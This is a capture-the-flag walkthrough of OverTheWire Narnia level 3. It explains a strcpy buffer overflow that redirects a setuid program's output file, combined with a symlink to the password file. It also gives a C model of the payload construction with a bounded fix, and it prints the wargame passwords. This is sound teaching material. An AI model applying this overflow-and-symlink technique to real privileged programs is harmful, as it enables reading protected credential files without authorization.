Level 3 Username : narnia3 Password : nairiepecu SSH : narnia.labs.overthewire.org:2226
To solve this level, we first ssh into the narnia server using the credentials provided above. Let’s have a look at the executable for this level and its source code.
As we can see above, the executable reads a file whose name the user supplies and copies its contents to '/dev/null'. '/dev/null' is the null device: a special file that discards everything written to it while reporting that the write succeeded. For more information on it, read the Wikipedia page on /dev/null.
On a first pass at the C code, we can see that it copies argv[1] into the input-file-name buffer with strcpy, which performs no length check at all. The buffer for the input file name is 32 bytes; the buffer for the output file name, pre-filled with "/dev/null", is 16 bytes. Let's look at the code in a debugger.
We can see above that the executable first opens the name stored at 0x58(%esp) and then the name stored at 0x38(%esp). These two locations are 0x20 (32) bytes apart, exactly the size of the input-file-name buffer, so the output file name sits directly above the input file name on the stack. Therefore, if we overflow the input-file-name buffer, we overwrite the output file name as well and can point it at something other than the null device.
Let's confirm this theory by passing a file name longer than 32 characters and breaking in gdb before the files are opened.
As we can see, there are two breakpoints set and a long file name passed to the executable. At the first breakpoint, right before the output file is opened, the output file name has become "7890", which is exactly the part of our argument that follows the first 32 characters, and the next few instructions show that "7890" is indeed the file being opened. We have therefore changed the output file name. Since the program exits if it cannot open the output file, let's create a file named "7890" so that execution reaches the second breakpoint, and then look at the input file name there.
As we can see, the input file name is the one we provided to the executable. We now control both the input file and the output file. Let's give the executable an input file that references the password and an output file that we can read.
To solve this, I created a folder within /tmp called Narnia0003 and a folder within it called SecurityTimes003. The path /tmp/Narnia0003/SecurityTimes003 is exactly 32 bytes long, so it fills the input-file-name buffer completely.
Therefore, whatever follows that path in the argument lands in the output-file-name buffer. I created an output file in /tmp named output, and an input file named output inside a folder named tmp nested under /tmp/Narnia0003/SecurityTimes003. Making that input file a symbolic link to the password file (/etc/narnia_pass/narnia4) and passing /tmp/Narnia0003/SecurityTimes003/tmp/output as the argument gives us both halves at once: the output file name becomes /tmp/output (the bytes after offset 32), while the input file name is still the whole argument, because the 32-byte buffer has no terminator of its own and the string runs straight on into the output-file-name buffer. The program runs with narnia4's privileges, so it can follow our symlink and read the password we cannot read ourselves. Two things to check before running it: /tmp/output has to exist already, since the program opens it rather than creating it, and it has to be writable by narnia4 and readable by us (chmod 666 is the simplest choice).
As we can see above, the executable writes the contents of the linked password file into /tmp/output, and reading that file gives us the password for the next level.
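The following is an added C model of the overflow described above and of the payload construction just used; it is example code written for this write-up, not the narnia3 binary or its source. It lays the two buffers out in a struct so that the adjacency seen in gdb (input name 0x20 bytes below output name) is fixed regardless of the host compiler, reproduces the strcpy overflow with a deterministic memcpy over that frame, and places a bounded copy next to it. The buffer sizes (32 and 16), the directory /tmp/Narnia0003/SecurityTimes003 and the output path /tmp/output come from the write-up; the function names are this example's own. It touches no files and does not need the narnia host.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define IFILE_LEN 32
#define OFILE_LEN 16

/* The narnia3 frame as the gdb session shows it: the input-file buffer
 * (0x38(%esp)) sits 0x20 bytes below the output-file buffer (0x58(%esp)).
 * A struct fixes that adjacency so the demo does not depend on how the
 * host compiler orders locals. */
struct frame {
    char ifile[IFILE_LEN];
    char ofile[OFILE_LEN];
};

static void init_frame(struct frame *f)
{
    memset(f, 0, sizeof *f);
    strcpy(f->ofile, "/dev/null");
}

/* Unbounded copy, the behaviour of strcpy(ifile, argv[1]) in narnia3.
 * Done with one memcpy over the frame so the overflow is deterministic;
 * a payload that would run past the end of the frame is refused here,
 * whereas the real strcpy would keep writing. */
static int copy_unbounded(struct frame *f, const char *arg)
{
    size_t n = strlen(arg) + 1;                     /* strcpy copies the NUL */
    if (n > sizeof *f - offsetof(struct frame, ifile))
        return 0;
    memcpy((char *)f + offsetof(struct frame, ifile), arg, n);
    return 1;
}

/* The bounded version: rejects any argument that does not fit, so ofile
 * can never be reached from argv[1]. */
static int copy_bounded(struct frame *f, const char *arg)
{
    if (strlen(arg) >= sizeof f->ifile)
        return 0;
    strcpy(f->ifile, arg);                          /* safe: checked above */
    return 1;
}

/* What open(ifile) actually sees after a 32-byte fill: ifile has no
 * terminator of its own, so the string runs straight on into ofile and
 * the input path is the whole argument. */
static const char *input_path(const struct frame *f)
{
    return (const char *)f;
}

/* Build argv[1]: a directory whose path is exactly IFILE_LEN bytes,
 * followed by the path we want to land in ofile. */
static int build_payload(char *out, size_t outsz,
                         const char *dir, const char *want_ofile)
{
    size_t dlen = strlen(dir), olen = strlen(want_ofile);
    if (dlen != IFILE_LEN)        return 0;   /* must fill ifile exactly */
    if (olen >= OFILE_LEN)        return 0;   /* must fit in ofile with NUL */
    if (dlen + olen + 1 > outsz)  return 0;
    memcpy(out, dir, dlen);
    memcpy(out + dlen, want_ofile, olen + 1);
    return 1;
}

int main(void)
{
    struct frame f;
    char payload[64];

    init_frame(&f);
    if (!build_payload(payload, sizeof payload,
                       "/tmp/Narnia0003/SecurityTimes003", "/tmp/output"))
        return 1;
    copy_unbounded(&f, payload);
    printf("input path : %s\n", input_path(&f));
    printf("output path: %s\n", f.ofile);

    init_frame(&f);
    printf("bounded copy accepted? %d, ofile still %s\n",
           copy_bounded(&f, payload), f.ofile);
    return 0;
}
```

The model makes the two requirements of the real exploit visible: the directory part of the argument must be exactly 32 bytes so that the tail lands at the start of the output-file-name buffer, and the tail must be short enough to fit there with its terminator (15 bytes or fewer). It also shows why the input file has to live under that 32-byte directory: the name the program opens is the whole argument, not just its first 32 bytes.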
Level 4 Username : narnia4 Password : thaenohtai SSH : narnia.labs.overthewire.org:2226